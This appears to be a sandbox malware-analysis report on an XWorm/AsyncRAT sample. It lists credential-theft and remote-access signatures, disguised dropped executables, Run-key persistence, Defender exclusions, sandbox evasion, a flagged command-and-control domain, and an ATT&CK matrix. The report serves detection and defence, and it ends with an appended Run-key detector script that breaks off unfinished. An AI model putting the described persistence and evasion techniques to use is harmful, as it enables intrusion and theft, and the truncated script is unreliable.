                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\Desktop\X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 5.0.Windows Defender.exe.170000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 13.0.Google Chrome.exe.610000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.X.exe.140f9ac0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.X.exe.140f9ac0.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: X.exe PID: 6696, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: Windows Defender.exe PID: 2548, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: Google Chrome.exe PID: 6568, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, type: DROPPED

                        Remote Access Functionality

                        Source: Yara match | File source: 5.0.Windows Defender.exe.170000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 13.0.Google Chrome.exe.610000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.X.exe.140f9ac0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.X.exe.140f9ac0.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: X.exe PID: 6696, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: Windows Defender.exe PID: 2548, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: Google Chrome.exe PID: 6568, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, type: DROPPED
                        MITRE ATT&CK Matrix (a leading number on a cell is the page's per-technique signature count marker)

                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 321 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 11 Registry Run Keys / Startup Folder | 11 Registry Run Keys / Startup Folder | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 1 DLL Side-Loading | 1 DLL Side-Loading | 51 Virtualization/Sandbox Evasion | Security Account Manager | 51 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Software Packing | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        Behavior Graph ID: 1528947 | Sample: X.exe | Startdate: 08/10/2024 | Architecture: WINDOWS | Score: 100 (graph image not reproducible; node text summarized below)
                        Network nodes: ip-api.com (208.95.112.1, ports 49805, 49949 to 80, TUT-ASUS, United States); time.windows.com; 3 other IPs or domains
                        Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 19 other signatures
                        Started at top level: X.exe; Windows Defender.exe (twice); 2 other processes
                        X.exe dropped: C:\Users\user\...\Windows Defender.exe (PE32); C:\Users\user\AppData\...\Google Chrome.exe (PE32); C:\Users\user\AppData\Local\...\X.exe.log (CSV)
                        X.exe signatures: Creates multiple autostart registry keys; Bypasses PowerShell execution policy; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 2 other signatures
                        X.exe started: Windows Defender.exe; Google Chrome.exe; powershell.exe; 2 other processes
                        Windows Defender.exe signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Adds a directory exclusion to Windows Defender; started powershell.exe (three instances), each with conhost.exe
                        Google Chrome.exe started: powershell.exe (two instances), each with conhost.exe
                        powershell.exe signatures: Loading BitLocker PowerShell Module; started conhost.exe
                        Other child processes: conhost.exe (two instances); chcp.com

                        Source | Detection | Scanner | Label | Link
                        X.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.XWormRAT
                        X.exe | 100% | Joe Sandbox ML
                        Source | Detection | Scanner | Label | Link
                        C:\Users\user\AppData\Local\Temp\Windows Defender.exe | 100% | Avira | TR/Spy.Gen
                        C:\Users\user\AppData\Local\Temp\Google Chrome.exe | 100% | Avira | TR/Spy.Gen
                        C:\Users\user\AppData\Local\Temp\Windows Defender.exe | 100% | Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\Google Chrome.exe | 100% | Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\Google Chrome.exe | 92% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
                        C:\Users\user\AppData\Local\Temp\Windows Defender.exe | 82% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
                        No Antivirus matches
                        No Antivirus matches
                        Source | Detection | Scanner | Label | Link
                        http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
                        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                        http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
                        http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
                        https://contoso.com/ | 0% | URL Reputation | safe
                        https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                        https://contoso.com/License | 0% | URL Reputation | safe
                        https://contoso.com/Icon | 0% | URL Reputation | safe
                        https://aka.ms/pscore68 | 0% | URL Reputation | safe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                        http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | unknown
                        ip-api.com | 208.95.112.1 | true | true | | unknown
                        time.windows.com | unknown | unknown | false | | unknown
                        Name | Malicious | Antivirus Detection | Reputation
                        22.ip.gl.ply.gg | true | | unknown
                        http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1453442601.00000253ADBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1639554132.000002D22106F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1756386840.000001D510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2141274912.00000190D484F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2276113890.0000021E474EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://crl.m | powershell.exe, 0000001A.00000002.2938908056.000001D0F6095000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.1423076041.000002539DDA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C4A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E376A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                        http://crl.microsoqx8 | powershell.exe, 00000011.00000002.2228425709.00000190DD0C3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.1423076041.000002539DDA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C4A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E376A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 0000001A.00000002.2977692716.000001D0F8241000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://contoso.com/ | powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1453442601.00000253ADBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1639554132.000002D22106F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1756386840.000001D510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2141274912.00000190D484F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2276113890.0000021E474EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://www.microsoft.co | powershell.exe, 00000006.00000002.1685428644.000002D229630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1685721301.000002D22983D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://contoso.com/License | powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                          http://crl.micpowershell.exe, 00000011.00000002.2232854236.00000190DD0EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://contoso.com/Iconpowershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.microsoft.powershell.exe, 00000009.00000002.1815371128.000001D5759FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.1423076041.000002539DB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C47E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E37481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F59571000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1423076041.000002539DB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C47E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E37481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F59571000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
IP: 208.95.112.1
Domain: ip-api.com
Country: United States
ASN: 53334
ASN Name: TUT-ASUS
Malicious: true
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1528947
                                                Start date and time:2024-10-08 14:01:12 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 17s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:31
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Sample name:X.exe
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winEXE@36/35@3/1
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 113
                                                • Number of non-executed functions: 7
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 13.95.65.251
                                                • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target Google Chrome.exe, PID 1168 because it is empty
                                                • Execution Graph export aborted for target Google Chrome.exe, PID 1888 because it is empty
                                                • Execution Graph export aborted for target Windows Defender.exe, PID 1180 because it is empty
                                                • Execution Graph export aborted for target Windows Defender.exe, PID 6932 because it is empty
                                                • Execution Graph export aborted for target X.exe, PID 6696 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 2056 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 2908 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 4472 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 4876 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 6684 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • VT rate limit hit for: X.exe
Time | Type | Description
08:02:21 | API Interceptor | 125x Sleep call for process: powershell.exe modified
14:02:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender C:\Users\user\AppData\Local\Temp\Windows Defender.exe
14:02:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender C:\Users\user\AppData\Local\Temp\Windows Defender.exe
14:03:00 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Google Chrome C:\Users\user\AppData\Local\Temp\Google Chrome.exe
14:03:08 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Google Chrome C:\Users\user\AppData\Local\Temp\Google Chrome.exe
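Detection logic for the Autostart entries above, as an added example (not Joe Sandbox's code and not the sample's): each write puts a Run value named after a trusted product ("Windows Defender", "Google Chrome") that points at an executable under %TEMP%, which is the pattern behind the "New RUN Key Pointing to Suspicious Folder" signature. The two suspicious events are built from the report's rows; the event field names, the two benign contrast events, and the folder and product-name lists are assumptions.

```python
"""Flag Run-key autostart writes that target a staging folder or borrow a
trusted product name.

Added example, not Joe Sandbox's or the sample's code. The first two
events are the report's Autostart rows; the benign events, the field
names and the folder/name lists are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class RegSetEvent:
    key_path: str    # registry key that was written
    value_name: str  # Run value name, e.g. "Windows Defender"
    value_data: str  # command line stored in the value


# HKCU/HKLM Run and RunOnce keys, including the "HKCU64" spelling the report
# uses for writes made through the 64-bit registry view.
RUN_KEY_RE = re.compile(
    r"^(HKCU|HKLM|HKEY_CURRENT_USER|HKEY_LOCAL_MACHINE)(64)?\\Software\\"
    r"(WOW6432Node\\)?Microsoft\\Windows\\CurrentVersion\\Run(Once)?$",
    re.IGNORECASE,
)

# User-writable staging folders an installer has no reason to autostart from
# (assumed list).
SUSPICIOUS_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\users\\public\\",
    "\\windows\\temp\\",
    "\\downloads\\",
)

# Product names the sample borrows for its Run values, and where the real
# products are installed (assumed list).
MASQUERADE_NAMES = ("windows defender", "google chrome", "microsoft edge")
TRUSTED_PREFIXES = (
    "c:\\program files\\",
    "c:\\program files (x86)\\",
    "c:\\windows\\",
    "c:\\programdata\\microsoft\\windows defender\\",
)


def exe_path(value_data: str) -> str:
    """Return the executable part of a Run value (strips quotes/arguments)."""
    data = value_data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    match = re.match(r"(.*?\.exe)", data, re.IGNORECASE)
    return match.group(1) if match else data


def is_run_key(key_path: str) -> bool:
    return bool(RUN_KEY_RE.match(key_path.strip()))


def suspicious_reasons(event: RegSetEvent) -> list:
    """List why a Run-key write is suspicious; an empty list means benign."""
    if not is_run_key(event.key_path):
        return []
    target = exe_path(event.value_data).lower()
    reasons = []
    for folder in SUSPICIOUS_DIRS:
        if folder in target:
            reasons.append(f"autostart target under {folder}")
    name = event.value_name.lower()
    if any(n in name for n in MASQUERADE_NAMES) and not target.startswith(TRUSTED_PREFIXES):
        reasons.append(f"value name '{event.value_name}' imitates a product not installed at {target}")
    return reasons


def scan(events) -> list:
    """Return (event, reasons) pairs for every suspicious Run-key write."""
    hits = []
    for event in events:
        reasons = suspicious_reasons(event)
        if reasons:
            hits.append((event, reasons))
    return hits


# Constructed input: the first two rows are the report's Autostart events,
# the last two are benign writes added for contrast.
EVENTS = [
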